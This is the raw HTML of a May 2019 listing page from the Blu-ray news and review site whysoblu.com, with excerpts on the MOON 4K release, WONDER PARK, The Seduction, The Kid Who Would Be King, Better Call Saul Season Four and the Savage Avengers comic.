style="margin-right: 10px;" title="MOON Launches Onto 4K Ultra-HD Blu-ray July 16th!" src="http://whysoblu.com/wp-content/uploads/2019/05/Moon.jpg" alt="" width="160" height="160" />Commemorate the 50<sup>th</sup> anniversary of the moon landing and the 10<sup>th</sup>anniversary of a modern sci-fi classic when <a rel="nofollow" name="_Hlk6559065"></a>Duncan Jones’ <b><i>MOON </i></b>debuts on 4K Ultra HD and in 4K with HDR via participating Digital platforms on July 16 from Sony Pictures Home Entertainment.  Oscar<sup>®</sup>-winner Sam Rockwell (Best Supporting Actor 2017, <i>Three Billboards Outside Ebbing, Missouri</i>) stars as an astronaut miner extracting precious Helium 3 from the moon, a resource that promises to reverse Earth’s energy crisis .  As he nears the end of his three-year contract, he makes an ominous discovery… <b><i>MOON</i></b> is remastered in 4K with HDR and newly remixed with Dolby Atmos audio – both approved by Writer/Director Duncan Jones. The release also includes the original 5.1 theatrical audio mix. The all-new bonus material for the 4K Ultra HD release of <b><i>MOON</i></b> includes a retrospective conversation between Writer/Director Jones and entertainment journalist Joe Utichi, never-before-seen deleted scenes and a gallery of unique and compelling fan art posters, reflecting the film’s passion-driven cult status.  Also included are archival special features including two commentaries, Q&amp;As and much more!</p> </div> </div> <p> <a href="http://whysoblu.com/moon-launches-onto-4k-ultra-hd-blu-ray-july-16th/#more-136665" class="more-link">Continue reading &#8216;MOON Launches Onto 4K Ultra-HD Blu-ray July 16th!&#8217;</a></p> <div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Fwhysoblu.com%2Fmoon-launches-onto-4k-ultra-hd-blu-ray-july-16th%2F&media=http%3A%2F%2Fwhysoblu.com%2Fwp-content%2Fuploads%2F2019%2F05%2FMoon.jpg&description=MOON%20Launches%20Onto%204K%20Ultra-HD%20Blu-ray%20July%2016th%21" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://whysoblu.com/moon-launches-onto-4k-ultra-hd-blu-ray-july-16th/" dc:identifier="http://whysoblu.com/moon-launches-onto-4k-ultra-hd-blu-ray-july-16th/" dc:title="MOON Launches Onto 4K Ultra-HD Blu-ray July 16th!" trackback:ping="http://whysoblu.com/moon-launches-onto-4k-ultra-hd-blu-ray-july-16th/trackback/" /> </rdf:RDF> --> <div class="entry-footer"> <span class="metatag">Tags: <a href="http://whysoblu.com/tag/duncan-jones/" rel="tag">duncan jones</a>, <a href="http://whysoblu.com/tag/sam-rockwell/" rel="tag">Sam Rockwell</a>.</span> <span class="metacat"><a href="http://whysoblu.com/category/news/" rel="category tag">News</a>,<a href="http://whysoblu.com/category/news/pr/" rel="category tag">Press Release</a></span> <a href="http://whysoblu.com/moon-launches-onto-4k-ultra-hd-blu-ray-july-16th/#respond">&nbsp;&nbsp;<span class="metacmt">Add a comment</span></a> </div> </div> <div id="post-136661" class="entry"> <h3 class="entry-header"><a href="http://whysoblu.com/wonder-park-blu-ray-june-18th/" rel="bookmark" title='Permanent Link to "Own WONDER PARK On Blu-ray June 18th!"'> Own WONDER PARK On Blu-ray June 18th!</a></h3> <div class="entry-date"> May 7th, 2019 by Brandon Peters </div> <p style="text-align: justify;"><img class="alignleft wp-image-136662 size-full" style="margin-right: 10px;" title="Own WONDER PARK On Blu-ray June 18th!" src="http://whysoblu.com/wp-content/uploads/2019/05/Wonder-Park.jpg" alt="" width="160" height="160" />Called “a celebration of imagination” (Bill Bregoli, CBS Radio) the delightful animated adventure <strong><em>WONDER PARK </em></strong>takes off on Digital June 4, 2019 and on Blu-ray Combo Pack and DVD June 18 from Paramount Home Entertainment. With school out for the summer, <strong><em>WONDER PARK </em></strong>on Digital* and Blu-ray Combo Pack offers a wealth of entertainment and activities to get kids’ imaginations soaring with singing, drawing, and more!   The fun-filled bonus content gives viewers the chance to sing along with June and her friends, learn how to draw Boomer and the Wonder Chimps, watch Gus the Beaver yodel his heart out, make crazy noises like voiceover artists, and take a tour of Wonderland. <a href="http://whysoblu.com/wonder-park-blu-ray-june-18th/#more-136661" class="more-link">Continue reading &#8216;Own WONDER PARK On Blu-ray June 18th!&#8217;</a></p> <div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Fwhysoblu.com%2Fwonder-park-blu-ray-june-18th%2F&media=http%3A%2F%2Fwhysoblu.com%2Fwp-content%2Fuploads%2F2019%2F05%2FWonder-Park.jpg&description=Own%20WONDER%20PARK%20On%20Blu-ray%20June%2018th%21" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://whysoblu.com/wonder-park-blu-ray-june-18th/" dc:identifier="http://whysoblu.com/wonder-park-blu-ray-june-18th/" dc:title="Own WONDER PARK On Blu-ray June 18th!" trackback:ping="http://whysoblu.com/wonder-park-blu-ray-june-18th/trackback/" /> </rdf:RDF> --> <div class="entry-footer"> <span class="metatag">Tags: <a href="http://whysoblu.com/tag/jennifer-garner/" rel="tag">Jennifer Garner</a>, <a href="http://whysoblu.com/tag/john-oliver/" rel="tag">John Oliver</a>, <a href="http://whysoblu.com/tag/ken-jeong/" rel="tag">Ken Jeong</a>, <a href="http://whysoblu.com/tag/kenan-thompson/" rel="tag">Kenan Thompson</a>, <a href="http://whysoblu.com/tag/matthew-broderick/" rel="tag">Matthew Broderick</a>.</span> <span class="metacat"><a href="http://whysoblu.com/category/amazon-pre-orders/" rel="category tag">Amazon Pre-Orders</a>,<a href="http://whysoblu.com/category/news/" rel="category tag">News</a>,<a href="http://whysoblu.com/category/news/pr/" rel="category tag">Press Release</a></span> <a href="http://whysoblu.com/wonder-park-blu-ray-june-18th/#respond">&nbsp;&nbsp;<span class="metacmt">Add a comment</span></a> </div> </div> <div id="post-136566" class="entry"> <h3 class="entry-header"><a href="http://whysoblu.com/seduction-blu-ray-review/" rel="bookmark" title='Permanent Link to "The Seduction (Blu-ray Review)"'> The Seduction (Blu-ray Review)</a></h3> <div class="entry-date"> May 6th, 2019 by Brandon Peters </div> <p style="text-align: justify;"><img class="alignleft wp-image-136273 size-full" style="margin-right: 10px;" title="The Seduction (Blu-ray Review)" src="http://whysoblu.com/wp-content/uploads/2019/04/Seduction.jpg" alt="" width="160" height="160" />Scream Factory seems to be making a light foray into the erotic thriller area of film genre-dom, continuing with this month&#8217;s release of the Morgan Fairchild-starring 1980s film The Seduction. If you&#8217;ll remember, they had a Valentine&#8217;s release of the four Poison Ivy films just few months back. The Seduction is getting some rather top tier treatment to with its Blu-ray debut here. They&#8217;ve got interviews, a commentary and vintage featurettes galore to soak up onto this disc. And yes, those new interviews do include a BRAND NEW one with Morgan Fairchild herself sitting down to reflect on her first lead role in a major motion picture. The street date for the release is May 21sts, so you have a little bit to pre-order a copy and if you use the Amazon link at the end of the review, you&#8217;ll help the site, and also secure the copy to your doorstep on the day of release. Maybe this review will be enough to seduce you into doing that. Or, maybe not.  <a href="http://whysoblu.com/seduction-blu-ray-review/#more-136566" class="more-link">Continue reading &#8216;The Seduction (Blu-ray Review)&#8217;</a></p> <div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Fwhysoblu.com%2Fseduction-blu-ray-review%2F&media=http%3A%2F%2Fwhysoblu.com%2Fwp-content%2Fuploads%2F2019%2F04%2FSeduction.jpg&description=The%20Seduction%20%28Blu-ray%20Review%29" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://whysoblu.com/seduction-blu-ray-review/" dc:identifier="http://whysoblu.com/seduction-blu-ray-review/" dc:title="The Seduction (Blu-ray Review)" trackback:ping="http://whysoblu.com/seduction-blu-ray-review/trackback/" /> </rdf:RDF> --> <div class="entry-footer"> <span class="metatag">Tags: <a href="http://whysoblu.com/tag/andrew-stevens/" rel="tag">Andrew Stevens</a>, <a href="http://whysoblu.com/tag/bruce-cohn-curtis/" rel="tag">Bruce Cohn Curtis</a>, <a href="http://whysoblu.com/tag/colleen-camp/" rel="tag">Colleen Camp</a>, <a href="http://whysoblu.com/tag/irwin-yablans/" rel="tag">Irwin Yablans</a>, <a href="http://whysoblu.com/tag/morgan-fairchild/" rel="tag">Morgan Fairchild</a>.</span> <span class="metacat"><a href="http://whysoblu.com/category/amazon-pre-orders/" rel="category tag">Amazon Pre-Orders</a>,<a href="http://whysoblu.com/category/blu-ray-reviews/" rel="category tag">Blu-ray Reviews</a></span> <a href="http://whysoblu.com/seduction-blu-ray-review/#respond">&nbsp;&nbsp;<span class="metacmt">Add a comment</span></a> </div> </div> <div id="post-136570" class="entry"> <h3 class="entry-header"><a href="http://whysoblu.com/kid-king-4k-uhd-blu-ray-review/" rel="bookmark" title='Permanent Link to "The Kid Who Would Be King (4K UHD Blu-ray Review)"'> The Kid Who Would Be King (4K UHD Blu-ray Review)</a></h3> <div class="entry-date"> May 6th, 2019 by Brandon Peters </div> <p style="text-align: justify;"><img class="alignleft wp-image-136571 size-full" style="margin-right: 10px;" title="The Kid Who Would Be King (4K UHD Blu-ray Review)" src="http://whysoblu.com/wp-content/uploads/2019/04/Kid-Who-Would-Be-King.jpg" alt="" width="160" height="160" />King Arthur has a had a rough go of it at the box office in recent years time. Guy Ritchie&#8217;s King Arthur: Legend of the Sword came out two years ago and bombed pretty hard (Having seen it, I&#8217;d say rightfully so). The Kid Who Would Be King takes a newer approach on the overdone source material and spins it around for a kid/family friendly adventure with some meat to it. Unfortunately, we failed this little gem at the box office. But now its coming to 4K Ultra-HD Blu-ray (Well, its ALREADY out on all home video formats now), where we can see that we maybe should have done batter by this one. <a href="http://whysoblu.com/kid-king-4k-uhd-blu-ray-review/#more-136570" class="more-link">Continue reading &#8216;The Kid Who Would Be King (4K UHD Blu-ray Review)&#8217;</a></p> <div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Fwhysoblu.com%2Fkid-king-4k-uhd-blu-ray-review%2F&media=http%3A%2F%2Fwhysoblu.com%2Fwp-content%2Fuploads%2F2019%2F04%2FKid-Who-Would-Be-King.jpg&description=The%20Kid%20Who%20Would%20Be%20King%20%284K%20UHD%20Blu-ray%20Review%29" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://whysoblu.com/kid-king-4k-uhd-blu-ray-review/" dc:identifier="http://whysoblu.com/kid-king-4k-uhd-blu-ray-review/" dc:title="The Kid Who Would Be King (4K UHD Blu-ray Review)" trackback:ping="http://whysoblu.com/kid-king-4k-uhd-blu-ray-review/trackback/" /> </rdf:RDF> --> <div class="entry-footer"> <span class="metatag">Tags: <a href="http://whysoblu.com/tag/angus-imrie/" rel="tag">Angus Imrie</a>, <a href="http://whysoblu.com/tag/joe-cornish/" rel="tag">Joe Cornish</a>, <a href="http://whysoblu.com/tag/louis-ashbourne-serkis/" rel="tag">Louis Ashbourne Serkis</a>, <a href="http://whysoblu.com/tag/patrick-stewart/" rel="tag">Patrick Stewart</a>, <a href="http://whysoblu.com/tag/rebecca-ferguson/" rel="tag">Rebecca Ferguson</a>, <a href="http://whysoblu.com/tag/tom-taylor/" rel="tag">tom taylor</a>.</span> <span class="metacat"><a href="http://whysoblu.com/category/blu-ray-reviews/4k-uhd-blu-ray-review/" rel="category tag">4K UHD Blu-ray Review</a>,<a href="http://whysoblu.com/category/amazon-pre-orders/" rel="category tag">Amazon Pre-Orders</a>,<a href="http://whysoblu.com/category/blu-ray-reviews/" rel="category tag">Blu-ray Reviews</a></span> <a href="http://whysoblu.com/kid-king-4k-uhd-blu-ray-review/#respond">&nbsp;&nbsp;<span class="metacmt">Add a comment</span></a> </div> </div> <div id="post-136613" class="entry"> <h3 class="entry-header"><a href="http://whysoblu.com/savage-avengers-makes-debut/" rel="bookmark" title='Permanent Link to "Savage Avengers Makes Debut"'> Savage Avengers Makes Debut</a></h3> <div class="entry-date"> May 5th, 2019 by Gregg Senko </div> <p style="text-align: justify;"><img class="alignleft wp-image-136633 size-thumbnail" style="margin-right: 10px;" title="Savage Avengers - Why So Blu" src="http://whysoblu.com/wp-content/uploads/2019/05/savage-square-160x160.jpg" alt="" width="160" height="160" srcset="http://whysoblu.com/wp-content/uploads/2019/05/savage-square-160x160.jpg 160w, http://whysoblu.com/wp-content/uploads/2019/05/savage-square-300x300.jpg 300w, http://whysoblu.com/wp-content/uploads/2019/05/savage-square.jpg 450w" sizes="(max-width: 160px) 100vw, 160px" />Like <em>Endgame</em> or not, there is definitely a Marvel high that’s wafting through the air right now. Entering its second weekend, the final Avengers movie will, without question, continue to behave like a financial behemoth. Although this is the end for the super team, it’s certainly not the end for all things Avengers. New to comic book stores this month is a fresh take on the group, dubbed <em>Savage Avengers</em>! Issue #1 came out on May 1st and I had the privilege of feasting my eyes on it earlier today.</p> <p> <a href="http://whysoblu.com/savage-avengers-makes-debut/#more-136613" class="more-link">Continue reading &#8216;Savage Avengers Makes Debut&#8217;</a></p> <div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Fwhysoblu.com%2Fsavage-avengers-makes-debut%2F&media=http%3A%2F%2Fwhysoblu.com%2Fwp-content%2Fuploads%2F2019%2F05%2Fsavage-square-160x160.jpg&description=Savage%20Avengers%20Makes%20Debut" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://whysoblu.com/savage-avengers-makes-debut/" dc:identifier="http://whysoblu.com/savage-avengers-makes-debut/" dc:title="Savage Avengers Makes Debut" trackback:ping="http://whysoblu.com/savage-avengers-makes-debut/trackback/" /> </rdf:RDF> --> <div class="entry-footer"> <span class="metacat"><a href="http://whysoblu.com/category/comics/" rel="category tag">Comics</a>,<a href="http://whysoblu.com/category/editorials/gregg-senko-editorials/" rel="category tag">Gregg Senko</a>,<a href="http://whysoblu.com/category/news/" rel="category tag">News</a></span> <a href="http://whysoblu.com/savage-avengers-makes-debut/#respond">&nbsp;&nbsp;<span class="metacmt">Add a comment</span></a> </div> </div> <div id="post-136568" class="entry"> <h3 class="entry-header"><a href="http://whysoblu.com/better-call-saul-season-four-blu-ray-review/" rel="bookmark" title='Permanent Link to "Better Call Saul: Season Four (Blu-ray Review)"'> Better Call Saul: Season Four (Blu-ray Review)</a></h3> <div class="entry-date"> May 3rd, 2019 by Brandon Peters </div> <p style="text-align: justify;"><img class="alignleft wp-image-135985 size-full" style="margin-right: 10px;" title="Better Call Saul: Season Four (Blu-ray Review)" src="http://whysoblu.com/wp-content/uploads/2019/03/Better-Call-Saul-S4.jpg" alt="" width="160" height="160" />AMC delivered a bit of a bummer recently as they announced the fifth season of the acclaimed Breaking Bad prequel series Better Call Saul would be delayed until 2020 for its premiere. They cited they needed the time to accommodate actor shooting schedules. While I&#8217;m disappointed as I love this series (One of my probably Top 5 of currently airing shows on any network/streaming service), I&#8217;m glad they are getting to make the show they are intending to without compromise. In the meantime, they are sticking to the Blu-ray schedule, however, and the fourth season will be arriving on May 7th, complete with a solid haul of bonus features and a digital copy of each episode.<br /> <a href="http://whysoblu.com/better-call-saul-season-four-blu-ray-review/#more-136568" class="more-link">Continue reading &#8216;Better Call Saul: Season Four (Blu-ray Review)&#8217;</a></p> <div class="pin-it-btn-wrapper"><a href="//www.pinterest.com/pin/create/button/?url=http%3A%2F%2Fwhysoblu.com%2Fbetter-call-saul-season-four-blu-ray-review%2F&media=http%3A%2F%2Fwhysoblu.com%2Fwp-content%2Fuploads%2F2019%2F03%2FBetter-Call-Saul-S4.jpg&description=Better%20Call%20Saul%3A%20Season%20Four%20%28Blu-ray%20Review%29" data-pin-do="buttonBookmark" data-pin-config="none" rel="nobox"><img src="//assets.pinterest.com/images/pidgets/pin_it_button.png" title="Pin It" data-pib-button="true" /></a></div> <!-- <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/"> <rdf:Description rdf:about="http://whysoblu.com/better-call-saul-season-four-blu-ray-review/" dc:identifier="http://whysoblu.com/better-call-saul-season-four-blu-ray-review/" dc:title="Better Call Saul: Season Four (Blu-ray Review)" trackback:ping="http://whysoblu.com/better-call-saul-season-four-blu-ray-review/trackback/" /> </rdf:RDF> --> <div class="entry-footer"> <span class="metatag">Tags: <a href="http://whysoblu.com/tag/bob-odenkirk/" rel="tag">Bob Odenkirk</a>, <a href="http://whysoblu.com/tag/giancarlo-esposito/" rel="tag">Giancarlo Esposito</a>, <a href="http://whysoblu.com/tag/jonathan-banks/" rel="tag">Jonathan Banks</a>, <a href="http://whysoblu.com/tag/michael-mckean/" rel="tag">Michael McKean</a>, <a href="http://whysoblu.com/tag/rhea-seehorn/" rel="tag">Rhea Seehorn</a>, <a href="http://whysoblu.com/tag/vince-gilligan/" rel="tag">Vince Gilligan</a>.</span> <span class="metacat"><a href="http://whysoblu.com/category/amazon-pre-orders/" rel="category tag">Amazon Pre-Orders</a>,<a href="http://whysoblu.com/category/blu-ray-reviews/" rel="category tag">Blu-ray Reviews</a></span> <a href="http://whysoblu.com/better-call-saul-season-four-blu-ray-review/#respond">&nbsp;&nbsp;<span class="metacmt">Add a comment</span></a> </div> </div> <div class="navigation"> <div class="floatleft"><a href="http://whysoblu.com/page/2/" >&laquo; Previous Entries</a></div> <div class="floatright"></div> <div class="clear"></div> </div> </div> <hr /> <div id="sidebar"> <ul> <form action="http://www.google.com/cse" id="cse-search-box" target="_blank"> <div> <input type="hidden" name="cx" value="partner-pub-9240716473479070:iqvcwpm0a8s" /> <input type="hidden" name="ie" value="ISO-8859-1" /> <input type="text" name="q" size="30" /> <input type="submit" name="sa" value="Search" /> </div> </form> <script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script> </ul> <div class="left-sidecolumn"> <ul> <li> <h2> Latest </h2> <ul> <li><a href='http://whysoblu.com/ozu-sirk-campion-coming-criterion-collection-august-2019/'>Ozu, Sirk, Campion &#038; More Coming to The Criterion Collection in August 2019</a></li> <li><a href='http://whysoblu.com/horror-masterpiece-stanley-kubricks-shining-arrives-4k-ultra-hd-blu-ray-october-1st/'>Horror Masterpiece Stanley Kubrick&#8217;s THE SHINING Arrives On 4K Ultra-HD Blu-ray October 1st!</a></li> <li><a href='http://whysoblu.com/giveaway-train-dragon-1-3-collection-blu-ray-soundtrack/'>GIVEAWAY: How To Train Your Dragon 1-3 Collection Blu-ray &#038; Soundtrack!</a></li> <li><a href='http://whysoblu.com/forrest-gump-25th-anniversary-national-mall-screening-newly-remastered-blu-ray-film-select-theaters/'>FORREST GUMP 25th Anniversary- National Mall Screening, Newly Remastered Blu-ray &#038; Film In Select Theaters</a></li> <li><a href='http://whysoblu.com/ill-take-dead-arrives-blu-ray-june-4th/'>I&#8217;LL TAKE YOUR DEAD Arrives On Blu-ray June 4th!</a></li> <li><a href='http://whysoblu.com/crank-4k-uhd-blu-ray-review/'>Crank (4K UHD Blu-ray Review)</a></li> <li><a href='http://whysoblu.com/escape-plan-extractors-blu-ray-dvd-july-2-2019/'>&#8216;Escape Plan: The Extractors&#8217; on Blu-ray &#038; DVD July 2, 2019!</a></li> <li><a href='http://whysoblu.com/coming-home-eureka-masters-cinema-blu-ray-dvd-july-15-2019/'>&#8216;Coming Home&#8217; [Eureka Masters of Cinema] on Blu-ray &#038; DVD July 15, 2019!</a></li> <li><a href='http://whysoblu.com/cockleshell-heroes-eureka-classics-blu-ray-dvd-july-15-2019/'>&#8216;The Cockleshell Heroes&#8217; [Eureka Classics] on Blu-ray &#038; DVD July 15, 2019!</a></li> <li><a href='http://whysoblu.com/donbass-montage-pictures-blu-ray-dvd-june-24-2019/'>&#8216;Donbass&#8217; [Montage Pictures] on Blu-ray &#038; DVD June 24, 2019!</a></li> </ul> </li> <li id="linkcat-2" class="linkcat"><h2>Blogroll</h2> <ul class='xoxo blogroll'> <li><a href="http://wordpress.org/development/">Development Blog</a></li> <li><a href="http://codex.wordpress.org/">Documentation</a></li> <li><a href="http://wordpress.org/extend/plugins/">Plugins</a></li> <li><a href="http://wordpress.org/extend/ideas/">Suggest Ideas</a></li> <li><a href="http://wordpress.org/support/">Support Forum</a></li> <li><a href="http://wordpress.org/extend/themes/">Themes</a></li> <li><a href="http://planet.wordpress.org/">WordPress Planet</a></li> </ul> </li> </ul> </div> <div class="right-sidecolumn"> <ul> <li id="text-3" class="widget widget_text"> <div class="textwidget"><br> <a href="http://whysoblu.com/category/blu-ray-reviews/4k-uhd-blu-ray-review/"> <img src="http://whysoblu.com/wp-content/uploads/2008/11/4K-Blu-ray-Reviews.jpg" alt="Check Out Our Exclusive 4K Ultra HD Blu-ray Reviews!" target="_blank"> </a> <br> <br></div> </li><li id="text-8" class="widget widget_text"> <div class="textwidget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 160x600, created 5/28/11 --> <ins class="adsbygoogle" style="display:inline-block;width:160px;height:600px" data-ad-client="ca-pub-9240716473479070" data-ad-slot="5073778417"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div> </li><li id="text-4" class="widget widget_text"> <div class="textwidget"><br> <a href="http://whysoblu.com/category/blu-ray-reviews/"> <img src="http://whysoblu.com/wp-content/uploads/2008/11/Blu-ray-Reviews.jpg" alt="Blu-ray Reviews" target="_blank"> </a> <a href="http://whysoblu.com/category/comics/"> <img src="http://whysoblu.com/wp-content/uploads/2008/11/Comics.jpg" alt="Comics" target="_blank"> </a> <a href="http://whysoblu.com/category/contests/"> <img src="http://whysoblu.com/wp-content/uploads/2008/11/Contests.jpg" alt="Contests" target="_blank"> </a> <a href="http://whysoblu.com/category/dvd-reviews/"> <img src="http://whysoblu.com/wp-content/uploads/2008/11/DVD-Reviews1.jpg" alt="DVD Reviews" target="_blank"> </a> <a href="http://whysoblu.com/category/events/"> <img src="http://whysoblu.com/wp-content/uploads/2008/11/Events2.jpg" alt="Events" target="_blank"> </a> <a href="http://whysoblu.com/category/gaming/"> <img src="http://whysoblu.com/wp-content/uploads/2008/11/Gaming.jpg" alt="Gaming" target="_blank"> </a> <a href="http://whysoblu.com/category/interviews/"> <img src="http://whysoblu.com/wp-content/uploads/2008/11/Interviews.jpg" alt="Interviews" target="_blank"> </a> <a href="http://whysoblu.com/category/movie-reviews/"> <img src="http://whysoblu.com/wp-content/uploads/2008/11/Movie-Reviews2.jpg" alt="Movie Reviews" target="_blank"> </a> <a href="http://whysoblu.com/category/music/"> <img src="http://whysoblu.com/wp-content/uploads/2008/11/Music1.jpg" alt="Music" target="_blank"> </a> <a href="http://whysoblu.com/category/news/"> <img src="http://whysoblu.com/wp-content/uploads/2008/11/News.jpg" alt="News" target="_blank"> </a> <a href="http://whysoblu.com/category/top-10/"> <img src="http://whysoblu.com/wp-content/uploads/2008/11/Top-101.jpg" alt="News" target="_blank"> </a> <br> <br></div> </li><li id="text-12" class="widget widget_text"> <div class="textwidget"><a href="https://www.facebook.com/whysoblu" target=“_blank”> <img src="http://whysoblu.com/wp-content/uploads/2008/11/Facebook-web.jpg" alt=“Like Us on Facebook!”> </a> <a href="https://twitter.com/whysoblu" target=“_blank”> <img src="http://whysoblu.com/wp-content/uploads/2008/11/Twitter-web.jpg" alt=“Follow Us on Twitter!”> </a> <br></div> </li> <li id="recent-posts-3" class="widget widget_recent_entries"> <h2 class="widgettitle">Recent Posts</h2> <ul> <li> <a href="http://whysoblu.com/ozu-sirk-campion-coming-criterion-collection-august-2019/">Ozu, Sirk, Campion &#038; More Coming to The Criterion Collection in August 2019</a> </li> <li> <a href="http://whysoblu.com/horror-masterpiece-stanley-kubricks-shining-arrives-4k-ultra-hd-blu-ray-october-1st/">Horror Masterpiece Stanley Kubrick&#8217;s THE SHINING Arrives On 4K Ultra-HD Blu-ray October 1st!</a> </li> <li> <a href="http://whysoblu.com/giveaway-train-dragon-1-3-collection-blu-ray-soundtrack/">GIVEAWAY: How To Train Your Dragon 1-3 Collection Blu-ray &#038; Soundtrack!</a> </li> <li> <a href="http://whysoblu.com/forrest-gump-25th-anniversary-national-mall-screening-newly-remastered-blu-ray-film-select-theaters/">FORREST GUMP 25th Anniversary- National Mall Screening, Newly Remastered Blu-ray &#038; Film In Select Theaters</a> </li> <li> <a href="http://whysoblu.com/ill-take-dead-arrives-blu-ray-june-4th/">I&#8217;LL TAKE YOUR DEAD Arrives On Blu-ray June 4th!</a> </li> <li> <a href="http://whysoblu.com/crank-4k-uhd-blu-ray-review/">Crank (4K UHD Blu-ray Review)</a> </li> <li> <a href="http://whysoblu.com/escape-plan-extractors-blu-ray-dvd-july-2-2019/">&#8216;Escape Plan: The Extractors&#8217; on Blu-ray &#038; DVD July 2, 2019!</a> </li> <li> <a href="http://whysoblu.com/coming-home-eureka-masters-cinema-blu-ray-dvd-july-15-2019/">&#8216;Coming Home&#8217; [Eureka Masters of Cinema] on Blu-ray &#038; DVD July 15, 2019!</a> </li> <li> <a href="http://whysoblu.com/cockleshell-heroes-eureka-classics-blu-ray-dvd-july-15-2019/">&#8216;The Cockleshell Heroes&#8217; [Eureka Classics] on Blu-ray &#038; DVD July 15, 2019!</a> </li> <li> <a href="http://whysoblu.com/donbass-montage-pictures-blu-ray-dvd-june-24-2019/">&#8216;Donbass&#8217; [Montage Pictures] on Blu-ray &#038; DVD June 24, 2019!</a> </li> <li> <a href="http://whysoblu.com/captain-marvel-dazzles-glorious-4k-ultra-hd-blu-ray-june-11th/">CAPTAIN MARVEL Dazzles On Glorious 4K Ultra-HD Blu-ray June 11th!</a> </li> <li> <a href="http://whysoblu.com/backdraft-4k-blu-ray-review/">Backdraft (4K Blu-Ray Review)</a> </li> <li> <a href="http://whysoblu.com/moon-launches-onto-4k-ultra-hd-blu-ray-july-16th/">MOON Launches Onto 4K Ultra-HD Blu-ray July 16th!</a> </li> <li> <a href="http://whysoblu.com/wonder-park-blu-ray-june-18th/">Own WONDER PARK On Blu-ray June 18th!</a> </li> <li> <a href="http://whysoblu.com/seduction-blu-ray-review/">The Seduction (Blu-ray Review)</a> </li> <li> <a href="http://whysoblu.com/kid-king-4k-uhd-blu-ray-review/">The Kid Who Would Be King (4K UHD Blu-ray Review)</a> </li> <li> <a href="http://whysoblu.com/savage-avengers-makes-debut/">Savage Avengers Makes Debut</a> </li> <li> <a href="http://whysoblu.com/better-call-saul-season-four-blu-ray-review/">Better Call Saul: Season Four (Blu-ray Review)</a> </li> <li> <a href="http://whysoblu.com/legend-lost-peter-mayhew-dies-74/">A Legend Lost &#8211; Peter Mayhew Dies at 74</a> </li> <li> <a href="http://whysoblu.com/scream-factorys-universal-horror-collection-volume-1-blu-ray-june-18th/">Own Scream Factory&#8217;s UNIVERSAL HORROR COLLECTION &#8211; Volume 1 On Blu-ray June 18th!</a> </li> </ul> </li><li id="text-6" class="widget widget_text"> <div class="textwidget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 200x200, created 6/24/11 --> <ins class="adsbygoogle" style="display:inline-block;width:200px;height:200px" data-ad-client="ca-pub-9240716473479070" data-ad-slot="7713447982"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div> </li><li id="text-2" class="widget widget_text"> <div class="textwidget"><br> <a href="http://whysoblu.com/category/comic-con/comic-con-2017/"> <img src="http://whysoblu.com/wp-content/uploads/2008/11/2017-Comic-Con-Coverage.jpg" alt="Check Out Our Exclusive 2017 Comic-Con Coverage!" target="_blank"> </a> <br> </div> </li><li id="text-13" class="widget widget_text"> <div class="textwidget"><br> <a href="http://whysoblu.com/category/sxsw/sxsw-2017/"> <img src="http://whysoblu.com/wp-content/uploads/2008/11/2017-SXSW.jpg" alt="Check Out Our Exclusive SXSW 2017 Reviews!" target="_blank"> </a> <br></div> </li><li id="text-10" class="widget widget_text"> <div class="textwidget"><br> <a href="https://itunes.apple.com/us/podcast/why-so-blu-podcast/id1127152404?mt=2" target=“_blank”> <img src="http://whysoblu.com/wp-content/uploads/2008/11/Why-So-Blu-Podcast-Icon.jpg" alt=“Listen to our OFFICIAL Podcast on iTunes!”> </a> <br></div> </li><li id="text-9" class="widget widget_text"> <div class="textwidget"><br> <a 